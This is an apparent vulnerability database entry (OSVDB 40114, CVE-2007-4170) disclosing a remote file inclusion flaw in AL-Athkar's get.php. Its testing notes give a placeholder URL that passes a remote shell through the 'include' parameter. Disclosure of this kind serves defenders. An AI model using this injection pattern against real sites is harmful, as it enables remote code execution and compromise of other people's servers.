AL-Athkar get.php include Variable Remote File Inclusion

2007-08-04T00:00:00
ID OSVDB:40114
Type osvdb
Reporter OSVDB
Modified 2007-08-04T00:00:00

Description

Manual Testing Notes

Http://[target]/[path]/get.php?include=[Shell-Attack]

References:

Vendor URL: http://www.swalefar.com/vb/showthread.php?t=98 Related OSVDB ID: 1020853 Related OSVDB ID: 40115 Other Advisory URL: http://securityreason.com/securityalert/2964 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0061.html ISS X-Force ID: 35818 CVE-2007-4170